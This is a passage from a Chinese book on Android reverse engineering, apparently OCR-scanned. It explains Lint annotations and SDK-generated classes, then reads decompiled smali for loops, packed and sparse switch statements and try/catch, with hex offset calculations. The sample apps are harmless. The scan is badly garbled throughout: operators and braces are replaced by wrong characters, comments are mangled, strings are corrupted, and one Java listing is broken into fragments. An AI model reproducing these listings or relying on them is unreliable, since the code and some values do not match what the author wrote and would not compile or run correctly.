以 上 介绍 的 注解 都 是 自动 生成 的 ， 用 户 不 可 以 在 代码 中 添加 使 用 。 在 
Android SDK r17 版 本 中 ，android.annotation 增 加 了 一 个 SuppressLint 注 解 ， 
它 的 作用 是 辅助 开发 人 员 去 除 代码 检查 器 (Lint API check) 添加 的 警告 信 
息 。 比 如 在 代码 中 声明 了 一 个 常量 但 在 代码 中 没有 使 用 它 ， 代 码 检查 器 检 
测 到 后 会 在 变量 所 在 的 代码 行 添加 警告 信息 (通常 的 表现 为 在 代码 行 的 最 
左边 添加 一 个 黄色 惊叹 号 的 小 图 标 以 及 在 变量 名 底部 会 加 上 一 条 黄色 波浪 
线 ) ， 将 鼠标 指向 变量 并 停留 片刻 ， 代 码 检查 器 会 给 出 提示 建议 ， 如 图 5-1 
所 示 。 


private Button 


adb The value of the field MainAÁctivity.btnl is not used 


3 quick fixes available: 


— aoi 


oubi ic void onc| 3€ Remove 'btnl', keep assignments with side effects 
super.onCre| ® Create getter and setter for 'btnl'... 
setContentV| @ Add GSuppresslarnings 'unused to 'btnl' 


btnAnno = (Button) findViewByld(R.id. btn annotation); 
图 5-1 ”代码 检查 器 提示 


根据 最 后 一 条 提示 建议 添加 @SuppressWarnings(“unused”) 注 解 后 ， 和 警告 
言 息 消 失 。 

另外 ， 如 果 在 程序 代码 中 使 用 到 的 API 等 级 比 AndroidManifest.xml 文 件 
中 定义 的 minSdkVersion 要 高 ， 代 码 检查 器 会 在 API 所 在 代码 行 添加 错误 信 
息 。 比 如 在 代码 中 使 用 了 File 类 的 getUsableSpace(0) 方 法 ， 该 API 要 求 的 最 低 
SDK 版 本 为 9， 如 果 minSdkVersion 指 定 的 值 为 8， 那 么 代码 检查 器 就 会 报错 
误 提 示 ， 解 决 方法 是 在 方法 或 方法 所 在 类 的 前 面 添加 “@TargetApi(9)”。 

除了 SuppressLint 与 TargetApi 注解 ，android.annotation 包 还 提供 了 
SdkConstant 与 Widget 两 个 注解 ， 这 两 个 注解 在 注释 中 被 标记 为 “@hide”， 即 
在 SDK 中 是 不 可 见 的 。SdkConstant 注 解 指 定 了 SDK 中 可 以 被 导出 的 常量 字 


段 值 ，Widget 注 解 指定 了 哪些 类 是 UI 类 ， 这 两 个 注解 在 分 析 Android 程 序 时 
基本 上 碰 不 到 ， 此 处 就 不 去 探究 了 。 


5.4.4 ”自动 生成 的 类 


使 用 Android SDK 默 认 生成 的 工程 会 自动 添加 一 些 类 。 这 些 类 在 程序 发 
布 后 会 仍然 保留 在 apk 文 件 中 ， 目 前 最 新 版 本 的 Android SDK 为 r20 版 ， 经 过 
笔者 研究 ， 发 现 会 自动 生成 如 下 的 类 。 

首先 是 R 类 ， 这 个 类 开发 Android 程 序 的 读者 应 该 会 很 熟悉 ， 工 程 res 目 
录 下 的 每 个 资源 都 会 有 一 个 id 值 ， 这 些 资源 的 类 型 可 以 是 字符 串 、 图 片 、 样 
式 、 颜 色 等 。 例 如 我 们 常见 的 R.java 代 码 如 下 。 


package com.droider.crackme0502; 
public final class R ( 


public static final class attr ( // 属 性 
) 
public static final class dimen ( IRSE 


public static final int padding large-0x7f040002; 
public static final int padding medium-0x7f£040001; 
public static final int padding. smallz0x7f040000; 

) 

public static final class drawable ( // 图 片 
public static final int ic action search-0x7f020000; 
public static final int ic launcher-z0x7f020001; 


) 
public static final class id ( / /idbsiH 
public static final int btn annotation-0x7f080000; 
public static final int btn checksn-z0x7f080002; 
public static final int edt snz0x7f£080001; 
public static final int menu settings-0x7f080003; 
) 
public static final class layout { / /布局 
public static final int activity main-0x7f030000; 
) 
public static final class menu ( / /菜单 
public static final int activity main-z0x7f070000; 
) 
public static final class string ( / /字符 串 
public static final int app name-0x7f050000; 
public static final int hello world-0x7f050001; 
public static final int menu settings-0x7f050002; 
public static final int title activity main-z0x7f050003; 
) 
public static final class style ( / LEX 
public static final int AppTheme-z0x7f060000; 
) 


由 于 这 些 资源 类 都 是 R 类 的 内 部 类 ， 因 此 它们 都 会 独立 生成 一 个 类 文 
件 ， 在 反 编 译 出 的 代码 中 ， 可 以 发 现 有 R.smali、 R$attr.smali 、 
R$dimen.smali ~、 R$drawable.smali ~ R$id.smali ~ R$layout.smali 、 
R$menu.smali、R$string.smali、Rg$style.smali 等 几 个 文件 。 

接 下 来 是 BuildConfig 类 ， 该 类 是 在 Android SDK r17 版 本 中 添加 的 ， 以 
后 版 本 的 Android 程 序 中 都 有 它 的 身影 。 这 个 类 中 只 有 一 个 boolean 类 型 的 名 
为 DEBUG 的 字段 ， 用 来 标识 程序 发 布 的 版 本 类 型 。 它 的 值 默认 是 trtue， 即 
程序 以 调试 版 本 发 布 。 由 于 这 个 类 是 自动 生成 的 ， 如 果 想 将 它 改 为 false， 
需要 先 在 Eclipse 开 发 环境 中 点 击 菜 单 “Project Build Automatically” 关 闭 自动 
构建 ， 然 后 点 击 菜单 “Project-Clean”， 现 在 使 用 右键 菜单 “Android 
Tools > Export Signed Application Package” 导 出 程序 ， 会 发 现 此 时 
BuildConfig.DEBUG 的 值 为 false 了 。 

然后 是 注解 类 ， 如 果 在 代码 中 使 用 了 SuppressLint 或 TargetApi 注 解 ， 程 
序 中 将 会 包含 相应 的 注解 类 ， 和 在 反 编译 后 会 在 smali\android\annotation 目 录 
下 生成 相应 的 smali 文 件 。 

Android SDK r20 更 新 后 ， 会 在 默认 生成 的 工程 中 添加 android-support- 
v4.jar 文 件 。 这 个 jar 包 是 Android SDK 中 提供 的 兼容 包 ， 里 面 提供 了 高 版 本 
才 有 的 如 Fragment、ViewPager 等 控件 供 低 版 本 的 程序 调用 。 QE 
细 í E&E 请 2 看 Android E 7 x 档 


http://developer.android.com/toolsextras/support-library.htmlo 


5.5 阅读 反 编 译 的 smali 代 码 


在 介绍 完了 smali 文 件 的 格式 与 自动 生成 的 类 后 ， 我 们 再 来 看 看 ，Java 
语言 编写 的 不 同 结构 的 代码 在 smali 文 件 中 都 有 些 什 么 特点 。 


5.5.1 ”循环 语句 


循环 语句 是 程序 开发 中 最 常用 的 语句 结构 ， 在 Android 开 发 过 程 中 ， 常 
见 的 循环 结构 有 迭代 器 循环 、for 循 环 、while 循 环 、do while 循 环 。 我 们 在 编 
与 迭代 器 循环 代码 时 ， 一 般 是 如 下 形式 的 代码 。 
Iterator« 4] R> <HR> = < ZA Inl fL Pe; 
for («XI $t» «X2: f» : <HR>) 1 
[45 PE IE INTE ST CET] 


或 者 : 
lterator< 寻 入 > <ER = < EBI INE; 
while (< 3 f (^ .hasNext()) 1 
<HR> <HRHA> = <E la> .next(); 
[UFER AI RES HICEM] 


1 
/ 


第 一 种 方式 的 迭代 是 for 关 键 字 中 将 对 象 名 与 对 象 列表 用 冒号 “: ” 隔 
开 ， 然 后 在 循环 体 中 直接 访问 单个 对 象 ， 这 种 方式 的 代码 简练 、 可 读 性 
好 ， 在 实际 的 编程 过 程 中 使 用 颇 多 。 第 二 种 方式 是 手动 获取 一 个 迭代 器 ， 
然后 在 一 个 循环 中 调用 迭代 器 中 的 hasNext0) 方 法 检测 是 否 为 空 ， 最 后 在 代 
码 循 环 体 中 调用 其 next0) 方 法 来 遍历 迭代 器 。 

将 本 节 提 供 的 示例 程序 Circulate.apk 反 编译 ， 然 后 打开 反 编 译 工程 
smali\com\droider\circulate 目 录 下 的 MainActivity.smali 文 件 ， 找 到 iterator() 方 
法 的 代码 如 下 。 


.method private iterator()V 
.locals 7 
.prologue 


.line 34 
const-string v4, "activity" 
invoke-virtual (p0, v4), Lcom/droider/circulate/MainActivity;-- 
getSystemService 
(Ljava/lang/String;)Ljava/lang/Object; # 获 取 ActivityManager 
move-result-object v0 
check-cast v0, Landroid/app/ActivityManager; 
.line 35 
.local v0, activityManager:Landroid/app/ActivityManager; 
invoke-virtual (v0), Landroid/app/ActivityManager; -»getRunningAppProcesses() 
Ljava/util/List; 
move-result-object v2 # 正 在 运行 的 进程 列表 
.line 36 
.local v2, psInfos:Ljava/util/List;, 
"Ljava/util/List«Landroid/app/ActivityManager$RunningAppProcessInfo;»;" 
new-instance v3, Ljava/lang/StringBuilder; # 新 建 一 个 StringBuilder 对 象 
invoke-direct (v3), Ljava/lang/StringBuilder;-><init>()V # 调 用 stringBuilder 
构造 函数 
.line 37 
.local v3, sb:Ljava/lang/StringBuilder; 
invoke-interface (v2), Ljava/util/List;-»iterator()Ljava/util/Iterator; 
# 获 取 进 程 列表 的 迭代 器 
move-result-object v4 
:goto 0 3A C HT AG 
invoke-interface (v4), Ljava/util/Iterator; -»hasNext()Z TIAS 
move-result v5 
if-nez v5, :cond 0 sx RT T LEGE 
.line 40 
invoke-virtual (v3), Ljava/lang/StringBuilder;-»toString()Ljava/lang/ 
String; 


vr rH 


move-result-object v4 4 StringBuilder 转 为 字符 串 
const/4 v5, 0x0 
invoke-static (p0, v4, v5), Landroid/widget/Toast;-»makeText 
(Landroid/content/Context;Ljava/lang/CharSequence;I)Landroid/ widget/ 
Toast; 
move-result-object v4 
invoke-virtual (v4), Landroid/widget/Toast;-»show()V4 弹出 stringBuilder 
的 内 容 
.line 41 
return-void # 方 法 返回 
.line 37 
:cond 0 
invoke-interface (v4), Ljava/util/Iterator;-»next()Ljava/lang/Object; 
# 循 环 获取 每 一 项 
move-result-object v1 
check-cast vl, Landroid/app/ActivityManager$RunningAppProcessInfo; 
.line 38 
.local vi, info:Landroid/app/ActivityManager$RunningAppProcessInfo; 
new-instance v5, Ljava/lang/StringBuilder; # 新 建 一 个 临时 的 stringBuilder 
iget-object v6, vl, Landroid/app/ActivityManager$RunningAppProcessInfo; 
-»processName:Ljava/lang/String; # 获 取 进 程 的 进程 名 
invoke-static {v6}, Ljava/lang/String;-»valueOf (Ljava/lang/Object;) 
Ljava/lang/String; 
move-result-object v6 
invoke-direct (v5, v6), Ljava/lang/StringBuilder;-»«init»(Ljava/lang/ 
String;)V 
const/16 v6，0xa# 换 行 符 
invoke-virtual (v5, v6), Ljava/lang/StringBuilder;--»append(C)Ljava/ 
lang/StringBuilder; 
move-result-object v5 # 组 合 进程 名 与 换行 符 
invoke-virtual (v5), Ljava/lang/StringBuilder;-»toString()Ljava/lang/ 
String; 
move-result-object v5 
invoke-virtual (v3, v5), Ljava/lang/StringBuilder; # 将 组 合 后 的 字符 串 添加 到 
StringBuilderXJÉ 
-»append(Ljava/lang/String;)Ljava/lang/StringBuilder; 
goto :goto 0 PEE TU REI JT ARAE 
.end method 


这 段 代码 的 功能 是 获取 正在 运行 的 进程 列表 ， 然 后 使 用 Toast 弹 出 所 有 
的 进程 名 。 获 取 正 在 运行 的 进程 列表 使 用 ActivityManager 类 的 
getRunningAppProceses() 方法 ， 后 者 会 返回 一 个 List< 


RunningAppProcessInfo> 对 象 ， 在 上 面 的 代码 中 ， 调 用 了 List 的 iterator() 来 获 
取 进 程 列表 的 迭代 器 ， 然 后 从 标号 goto_0 开 始 进 入 迭代 循环 。 在 循环 中 首先 
调用 迭代 器 的 hasNext() 方 法 检测 迭代 器 是 否 为 空 ， 如 果 迭 代 器 为 空 就 调用 
Toast 弹 出 所 有 进程 信息 ， 如 果 不 为 空 ， 说 明 迭 代 器 中 的 内 容 还 没有 取 完 ， 
调用 迭代 器 的 next(0) 方 法 获取 单个 RunningAppProcessInfo 对 象 ， 接 着 新 建 一 
个 临时 的 StringBuilder， 将 进程 名 与 换行 符 组 合 后 添加 到 循环 开始 前 创建 的 
StringBuilder 中 ， 最 后 使 用 goto 语 句 跳 转 到 循环 体 的 开始 处 。 

看 完 这 一 段 代 码 ， 读 者 肯定 会 发 现 它 与 上 面 列 出 的 while 循 环 声明 非常 
相似 了 ! 没 错 ， 第 一 种 迭代 器 循环 展开 后 就 是 第 二 种 循环 的 实现 ， 虽 然 彼 
此 的 Java 代 码 不 同 ， 但 生成 的 反 汇 编 代码 极 具 相 似 。 总 结 一 下 ， 和 迭代 器 循环 
有 如 下 特点 : 

e 和 迭代 器 循环 会 调用 迭代 器 的 hasNext() 方 法 检测 循环 条 件 是 否 满足 。 

e 迭代 器 循环 中 调用 迭代 器 的 next() 方 法 获取 单个 对 象 。 

e 循环 中 使 用 goto 指 令 来 控制 代码 的 流程 。 

e for 形式 的 迭代 器 循环 展开 后 即 为 while 形 式 的 迭代 器 循环 。 

下 面 看 看 传统 的 for 循 环 ， 找 到 MainActivity.smali 文 件 中 的 forCirculate() 
方法 ， 代 码 如 下 。 


.method private forCirculate()V 

.locals 8 

.prologue 

.line 47 

invoke-virtual (p0), Lcom/droider/circulate/MainActivity;- 
-»getApplicationContext ()Landroid/content/Context; 

move-result-object v6 

invoke-virtual (v6), Landroid/content/Context; # 获 取 PackageManagez 
-»getPackageManager ()Landroid/content/pm/PackageManager; 

move-result-object v3 

.line 49 

.local v3, pm:Landroid/content/pm/PackageManager; 

const/16 v6, 0x2000 

.line 48 

invoke-virtual (v3, v6), Landroid/content/pm/PackageManager; 
-»getInstalledApplications(I)Ljava/util/List;  # 获 取 已 安装 的 程序 列表 

move-result-object v0 

.line 50 

.local v0, appInfos:Ljava/util/List;,"Ljava/util/List«Landroid/content /pm 

/ApplicationInfo;»;" 

invoke-interface (v0), Ljava/util/List;-»size()I  # 获 取 列 表 中 ApplicationInfo 

对 象 的 个 数 

move-result v5 

.line 51 

.local v5, size:I 

new-instance v4, Ljava/lang/StringBuilder; # 新 建 一 个 StringBuilder 对 象 

invoke-direct (v4), Ljava/lang/StringBuilder;-»«init»()V # 调 用 

stringBuilder 的 构造 函数 

.line 52 

.local v4, sb:Ljava/lang/StringBuilder; 

const/4 v1, 0x0 

.local v1, i:I  $WUJ5vio 

:goto O0 (HE un 

if-lt v1, v5, :cond 0 # 如 果 v1 小 于 v5， 则 跳 转 到 conqa_0 标号 处 

.line 56 

invoke-virtual (v4), Ljava/lang/StringBuilder;-»toString()Ljava/ 

lang/String; 

move-result-object v6 

const/4 v7, 0x0 


invoke-static (p0, v6, v7), Landroid/widget/Toast; # 构 造 Toast 
-»makeText (Landroid/content/Context;Ljava/lang/CharSequence;I) 
Landroid/widget/Toast; 

move-result-object v6 

invoke-virtual {v6}，Landroid/widget/Toast;->show()V# 显 示 已 安装 的 程序 列表 

.line 57 

return-void # 方 法 返回 

.line 53 

:cond 0 

invoke-interface (v0, v1), Ljava/util/List;-»get(I)Ljava/lang/Object; 

# 单 个 ApplicationInfo 

move-result-object v2 

check-cast v2, Landroid/content/pm/ApplicationInfo; 

.line 54 

.local v2, info:Landroid/content/pm/ApplicationInfo; 

new-instance v6, Ljava/lang/StringBuilder; # 新 建 一 个 临时 stringBuilder 对 象 

iget-object v7, v2, Landroid/content/pm/ApplicationInfo;-»packageName: 

Ljava/lang/String; 

invoke-static (v7), Ljava/lang/String;-»valueOf (Ljava/lang/Object;) 

Ljava/lang/String; 

move-result-object v7 # 包 名 

invoke-direct (v6, v7), Ljava/lang/StringBuilder;-»«init»(Ljava/lang/ 

String;)V 

const/16 v7, 0xa # 换 行 符 

invoke-virtual (v6, v7), Ljava/lang/StringBuilder; -»append(C)Ljava/ 

lang/StringBuilder; 

move-result-object v6 ”# 组 合 包 名 与 换行 符 

invoke-virtual (v6), Ljava/lang/StringBuilder;-»toString()Ljava/lang 

/String; # 转 换 为 字符 串 

move-result-object v6 

invoke-virtual (v4, v6}, Ljava/lang/StringBuilder;- 
»-append(Ljava/lang/String;)Ljava/lang/StringBuilder; ids n d (f o 
的 StzingBuilder 中 

.line 52 

add-int/lit8 v1, v1, 0x1 非 下 一 个 索引 

goto :goto 0 # 跳 转 到 循环 起 始 处 

.end method 


这 段 代码 的 功能 是 获取 所 有 安装 的 程序 ， 然 后 使 用 Toast 弹 出 所 有 的 软 
件 包 名 。 获 取 所 有 安装 的 程序 使 用 PackageManager 类 的 
getInstalledApplications() 方 法 ， 代 码 首先 创建 了 一 个 StringBuilder 对 象 用 来 存 
放 所 有 的 字符 串 信 息 ， 接 着 初始 化 v1 寄 存 器 为 0 作为 获取 列表 项 的 索引 ，for 


循环 的 起 始 处 是 goto_0 标 号 ， 循 环 条 件 的 代码 为 “if-lt v1, v5, :cond_0”，v1 为 
索引 值 ，v5 为 列表 中 ApplicationInfo 的 个 数 ，cond_0 标 号 处 的 代码 为 循环 
体 ， 如 果 没 有 索引 到 最 后 一 项 ， 代 码 都 会 跳 到 cond_0 标 号 处 去 执行 ， 相 
反 ， 如 果 索 引 完 了 ， 代 码 会 顺序 执行 Toast 显 示 所 有 的 字符 串 信 息 。cond_0 
标号 处 的 第 一 行 代码 调用 List 的 get(O) 方 法 获取 列表 中 的 单个 ApplicationInfo 对 
象 ， 然 后 组 合 包 名 与 换行 符 后 添加 到 先前 声明 的 StringBuilder 中 ， 最 后 将 v1 
索引 值 加 一 后 调用 “goto :goto_0” 语 句 跳 转 到 循环 起 始 处 。 

看 完了 for 循 环 的 代码 ， 可 以 发 现 它 有 如 下 特点 : 

e 在 进入 循环 前 ， 需 要 先 初始 化 循环 计数 器 变量 ， 且 它 的 值 需 要 在 循 
环 体 中 更 改 。 

e 循环 条 件 判断 可 以 是 条 件 跳 转 指令 组 成 的 合法 语句 。 

e 循环 中 使 用 goto 指 令 来 控制 代码 的 流程 。 

接 下 来 是 while 循 环 与 do while 循 环 ， 两 者 结构 差异 不 大 ， 只 是 循环 条 件 
判断 的 位 置 有 所 不 同 。 并 且 它 们 的 代码 与 前 面 介 绍 的 迭代 器 循环 代码 十 分 
相似 。 笔 者 在 此 就 不 列 出 了 ， 有 兴趣 的 读者 可 自行 阅读 MainActivity.smali 文 
件 中 的 whileCirculate() 与 dowhileCirculate() 方 法 的 代码 。 


5.5.2 ” ”switch 分支 语句 


switch 分 支 也 是 比较 常见 的 语句 结构 ， 经 常 出 现在 判断 分 支 比 较 多 的 代 
码 中 。 使 用 Apktool 反 编译 本 书 配 套 源 代码 中 5.5.2 小 节 提 供 的 SwitchCase.apk 
x t, 打开 反 编译 后 工程 H x m B 
smali\com\droider\switchcase\MainActivity.smali X {F , $8 2I] packedSwitch0 
法 的 代码 如 下 。 


.method private packedSwitch(I)Ljava/lang/String; 
.locals 1 
.parameter "i" 
.prologue 
.line 21 
const/4 v0, 0x0 
.line 22 
.local v0, str:Ljava/lang/String;  ”#v0 为 字符 早 ，0 表 示 nu1ll 
packed-switch pl, :pswitch data 0  #packed-switch 人 分支, pswitch_qdata_0 指 


定 case 区 域 

.line 36 

const-string v0, "she is a person" #default 分 支 
.line 39 

:goto_0 # 所 有 case 的 出 口 

return-object v0# 返 回 字 符 串 v0 

.line 24 

:pswitch 0 #case 0 


const-string v0, "she is a baby" 


.line 25 

goto :goto 0 HEFE fllgoto Obs ub 
.line 27 

:pswitch 1 #case 1 


const-string v0, "she is a girl" 


.line 28 

goto :goto, 0 # 跳 转 到 goto_0 标 号 处 
.line 30 

:pswitch 2 #case 2 
const-string v0, "she is a woman" 
.line 31 

goto :goto 0 # 跳 转 到 goto_0 标 号 处 
.line 33 

:pswitch 3 #case 3 


const-string v0, "she is an obasan" 

.line 34 

goto :goto 0 # 跳 转 到 goto_0 标 号 处 

.line 22 

nop 

:pswitch data 0 

.packed-switch 0x0 &case 区 域 ， 从 0 开始 ， 依 次 递增 
:pswitch, 0 #case 
:pswitch 1 #case 
:pswitch 2 #case 


mw N Pe o 


:pswitch 3 #case 
.end packed-switch 
.end method 


代码 中 的 Switch 分支 使 用 的 是 packed-switch 指 令 。p1 为 传递 进来 的 int 类 
型 的 数值 ，pswitch_data_0 为 case 区 域 ， 在 case 区 域 中 ， 第 一 条 指令 “.packed- 
switch” 指 定 了 比较 的 初始 值 为 0，pswitch_0~pswitch_3 分 别 是 比较 结果 为 
“case 0” 到 “case 3” 时 要 跳 转 到 的 地 址 。 可 以 发 现 ， 标 号 的 命名 采用 pswitch_ 
开关 ， 后 面 的 数值 为 case 分 支 需 要 判断 的 值 ， 并 且 它 的 值 依次 递增 m 
看 这 些 标号 处 的 代码 ， 每 个 标号 处 都 使 用 v0 寄 存 器 初始 化 一 个 字符 串 ， 然 
后 跳 转 到 了 goto_0 标 号 处 ， 可 见 goto_0 是 所 有 的 case 分 支 的 出 口 。 另 ^d , 
“.packed-switch” 区 域 指定 的 case 分 支 共 有 4 条 ， 对 于 没有 被 判断 的 default 分 
支 ， 会 在 代码 的 packed-switch 指 令 下 面 给 出 。 

packed-switch 指 令 在 Dalvik 中 的 格式 如 下 : 

packed-switch vAA, + BBBBBBBB 

指令 后 面 的 *+BBBBBBBB” 被 指明 为 一 个 packed-switch-payload 格 式 的 
偏 移 。 它 的 格式 如 下 。 


struct packed-switch-payload { 
ushort ident; /* {B/E 0x0100 */ 
ushortsize;  /* case XH */ 
int first key; /* PIÉS case HIA */ 
int[] targets; /* FS case fIIXI switch 26 4I te */ 


l. 
E 


打开 IDA Prot l| *packed-switch p1, :pswitch data 0"$8E $ fu F Ox2cb1a 
处 ， 相 应 的 机 器 码 为 “2B 02 13 00 00 00”， 手 动 分 析 机 器 码 如 下 : 

2B 为 packed-switch 的 OpCode。 

02 为 寄存 器 p1。 

00000013 为 偏 移 量 0x13。 

Dalvik 中 计算 偏 移 是 以 两 个 字 节 为 单位 ， 因 为 实际 该 指令 指向 的 
packed-switch-payload 结 构 体 的 偏 移 量 为 0x2cbla + 2 * 0x13 = 0x2cb40。 使 用 
C32asm 查 看 该 处 的 数据 如 图 5-2 所 示 。 


w. — [(HEX)classes. dex] 
Em 文件 (FE) ”编辑 (E) 搜索 (5) 查看 (V) IA) 高 级 (A) 窗口 (W) X, 


Gd ase 7, «3 2 = Œ 


Wi (HEX)classes.dex | 


86 80 00 00 09 60 88 Ə 
803 88 02 808 80 880 08 68 


HEOD 01 04 OG 60 860 660 80 
HEOC OO 80 668 OF 860 68 8 


图 5-2 ”packed-switch-payload 结 构 体 数据 


第 1 个 ident 字 段 为 0x100， 标 识 packed-switch 有 效 的 case 区 域 。 第 2 个 字 
段 size 为 4， 表 明 有 4 个 case。 第 3 个 字段 first_key 为 0， 表 明 初 始 case 值 为 0。 
第 4 个 字段 为 偏 移 量 ， 分 别 为 0x6、0x9、0xc、0xf， 加 上 packed-switch 指 令 
的 偏 移 值 0x2cb1a， 计 算 可 得 : 

case 0 位 置 = 0x2cbla + 2 * 0x6 = 0x2cb26 

case 1 位 置 = 0x2cbla + 2 * 0x9 = 0x2cb2c 

case 2 位 置 = 0x2cbla + 2 * 0xc = 0x2cb32 

case 3 位 置 = 0x2cbla + 2 * Oxf = 0x2cb38 

至 此 ， 有 规律 递增 的 switch 分 支 就 算是 搞 明 白 了 。 最 后 ， 将 这 段 smali 代 
码 整 理 为 Java 代 码 如 下 。 


private String packedSwitch(int i) ( 
String str = null; 
switch (i) ( 
case 0: 
str - "she is a baby"; 
break; 
case 1: 
Str = "ghe is a girit; 
break; 
case 2: 
str - "she is a woman"; 
break; 
case 3: 
str - "she is an obasan"; 
break; 
default: 
str - "she is a person"; 
break; 
) 
return str; 


} 
现在 我 们 来 看 看 无 规律 的 case 分 支 语 句 代 码 会 有 什么 不 同 ， 找 到 
MainActivity.smali 文 件 的 sparseSwitch() 方 法 代码 如 下 。 


.method private sparseSwitch(I)Ljava/lang/String; 
.locals 1 
.parameter "age" 
.prologue 
.line 43 
const/4 v0, 0x0 
.line 44 
.local v0, str:Ljava/lang/String; 
sparse-switch pl, :sswitch data 0 # sparse-switch4)X, sswitch data 0 


指定 case 区 域 

.line 58 

const-string v0, "he is a person" #case default 
.line 61 

:goto 0 #case 出 口 

return-object v0 # 返 回 字 符 串 

.line 46 

:Sswitch 0 #case 5 


const-string v0, "he is a baby" 


.line 47 

goto :goto_0# 跳 转 到 goto_0 标 号 处 
.line 49 

:sswitch 1 #case 15 


const-string v0, "he is a student" 


.line 50 

goto :goto_0# 跳 转 到 goto_0 标 号 处 
.line 52 

:Sswitch 2 #case 35 


const-string v0, "he is a father" 


.line 53 

goto :goto_0# 跳 转 到 goto_0 标 号 处 
|line:55 

:Sswitch 3 #case 65 


const-string v0, "he is a grandpa" 


.line 56 

goto :goto_0# 跳 转 到 goto_0 标 号 处 

.line 44 

nop 

:sswitch data O0 

.sparse-switch tcasebc bi 
0x5 -> :sswitch 0 fcase 5(0x5) 
Oxf -» :sswitch 1 #case 15(0xf) 
0x23 -> :sswitch 2 #case 35(0x23) 
0x41 -> :sswitch 3 #case 65(0x41) 


.end sparse-switch 
.end method 


代码 中 的 switch 分 支 使 用 的 是 sparse-switch 指 令 。 按 照 分 析 packed-switch 
的 方法 ， 我 们 直接 查看 sswitch_data_ 0 标号 处 的 内 容 。 可 以 看 到 “.sparse- 
switch” 指 令 没 有 给 出 初始 case 的 值 ， 所 有 的 case 值 都 使 用 “case 值 -> case 标 
号 ”的 形式 给 出 。 此 处 共有 4 个 case， 它 们 的 内 容 都 是 构造 一 个 字符 串 ， 然 后 
跳 转 到 goto_0 标 号 处 ， 代 码 架 构 上 与 packed-switch 方 式 的 Switch 分 支 一 样 。 
sparse-switch 指 令 在 Dalvik 中 的 格式 如 下 : 
sparse-switch vAA, + BBBBBBBB 
指令 后 面 的 *+BBBBBBBB” 被 指明 为 一 个 sparse-switch-payload 格 式 的 偏 
移 。 它 的 格式 如 下 。 
struct sparse-switch-payload { 
ushort ident; /* {H EDEJX 0x0200 */ 
ushortsize; /* case Zt EH */ 
int[] keys; — /* £f case HI, MFM ERIT */ 
int[] targets; /* EF case TII switch 25 4 II */ 
f: 
同样 地 ， 打 开 IDA Pro 找 到 “sparse-switch p1, :sswitch_data_0” 指 令 位 于 
0x2cb6a 处 ， 相 应 的 机 器 码 为 “2C 02 13 00 00 00”， 手 动 分 析 机 器 码 如 下 : 
2C 为 sparse -switch 的 OpCode。 
02 为 寄存 器 pl。 
00000013 为 偏 移 量 0x13。 
为 实际 该 指令 指向 的 sparse-switch-payload 结 构 体 的 偏 移 量 为 0x2cb6a 
+ 2 * 0x13 = 0x2cb90。 该 处 的 数据 如 图 5-3 所 示 。 


bob 文件 (FE) ME) ”搜索 (5) SEV) IA) BRA) ”窗口 (W) 帮助 (H) 
六 (HEX)classes.dex | 


"Mi 


I8882CB88:| 28 FA 1A OO BA 68 28 F7 1A OO BB 88 28 F^ OG 88 (?.?(?.?(? WAGE 


SA 02 64 00 05 OG OO 080 GF OO 60 60 23 060 0G 0G 
LDIAM:IDISMEnT 00 60 60 86 806 OO OO 89 OO OG OA BC 68 86 86 
I88602CBB8:| P E 06 00 02 00 03 08 08 OG 37 91 O4 86 . 
j0002CBC8:| 23 600 00 00 12 03 6F 20 17 60 54 800 15 602 803 7F 4s..... 0 ..T....N 


图 5-3 ”sparse-switch-payload 结 构 体 数据 


第 1 个 ident 字 段 为 0x200， 标 识 sparse-switchx 有 效 的 case 区 域 。 第 2 个 字段 
size 为 4， 表 明 有 4 个 case。 第 3 个 字段 keys 为 4 个 case 的 值 ， 分 别 为 0x5、 Oxf. 
0x23、0x41。 第 4 个 字段 分 别 为 偏 移 量 ， 分 别 为 0x6、0x9、0xc、0xf， 加 上 
sparse -switch 指 令 的 偏 移 值 0x2cb6a， 计 算 可 得 : 

case 0 位 置 = 0x2cb6a + 2 * 0x6 = 0x2cb76 

case 1 位 置 = Ox2cb6a + 2 * 0x9 = 0x2cb7c 

case 2 位 置 = 0x2cb6a + 2 * 0xc = 0x2cb82 

case 3 位 置 = 0x2cb6a + 2 * 0xf = 0x2cb88 

最 后 ， 将 这 段 smali 代 码 整 理 为 Java 代 码 如 下 。 


private String sparseSwitch(int age) { 


String str - 
switch (age) 
case 5: 
str - 
break; 
case 15: 
str = 
break; 
case 35: 
str - 
break; 
case 65: 
str - 
break; 
default: 
str = 
break; 
) 
return str; 


null; 


( 


"he 


"he 


"he 


" he 


"he 


is 


is 


is 


is 


is 


baby" ; 


student"; 


father"; 


grandpa"; 


person"; 


5.5.3 ”try/catch 语 句 


在 实际 编写 代码 过 程 中 ， 各 种 预想 不 到 的 结果 都 有 可 能 出 现 ， 为 了 尽 
可 能 的 捕捉 到 异常 信息 ， 有 必要 在 代码 中 使 用 Try/Catch 语 句 将 可 能 发 生 问 
题 的 代码 “ 包 吐 ”起 来 。 使 用 Apktool 反 编译 随 书 5.5.3 小 节 提 供 的 TryCatch.apk 
文件 ， 打 开 反 编 X m IL d$ H m 中 的 
smali\com\droider\trycatch\MainActivity.smali 文 件 ， 找 到 tryCatch() 方 法 代码 
如 下 。 


.method private tryCatch(ILjava/lang/String;)V 

.locals 10 

.parameter "drumsticks" 

.parameter "peple" 

.prologue 

const/4 v9, 0x0 

.line 19 

:try start 0 # 第 1 个 try 开 始 

invoke-static {p2}, Ljava/lang/Integer;->parseInt (Ljava/lang/String;)I 

# 将 第 2 个 参数 转换 为 nt 型 

:try end 0 # 第 1 个 try 结 束 

.catch Ljava/lang/NumberFormatException; (:try start 0 .. :try end 0) : 

catch 1 # catch 1 

move-result vl # 如 果 出 现 异常 这 里 不 会 执行 ， 会 跳 转 到 catch_1 标 号 处 

.line 21 

.local vi, i:I # .1ocal 声 明 的 变量 作用 域 在 .1ocal 声 明 与 .end local 之 间 

:try start 1 # 第 2 个 try 开 始 

div-int v2, pl, vl # 第 1 个 参数 除 以 第 2 个 参数 

.line 22 

.local v2, m:I #m 为 商 

mul-int v5, v2, vl #m* i 

sub-int v3, pl, v5 #v3 为 余数 

.line 23 

local wv, A: 

const-string v5, "Xu5171Nu6709$dNu53eaNu9e21Nu817£Nu£f0c$d 
Nu4e2aNu4ebaNu5e73Nu5206Nu£f£0cNu6bcfNu4ebaNu53efNu5206Nu5£97$d 
\u53ea\uff0c\u8fd8\u5269\u4e0b%$d\u53ea" # 格 式 化 字符 串 

const/4 v6, 0x4 

new-array v6, v6, [Ljava/lang/Object; 

const/4 v7, 0x0 

.line 24 

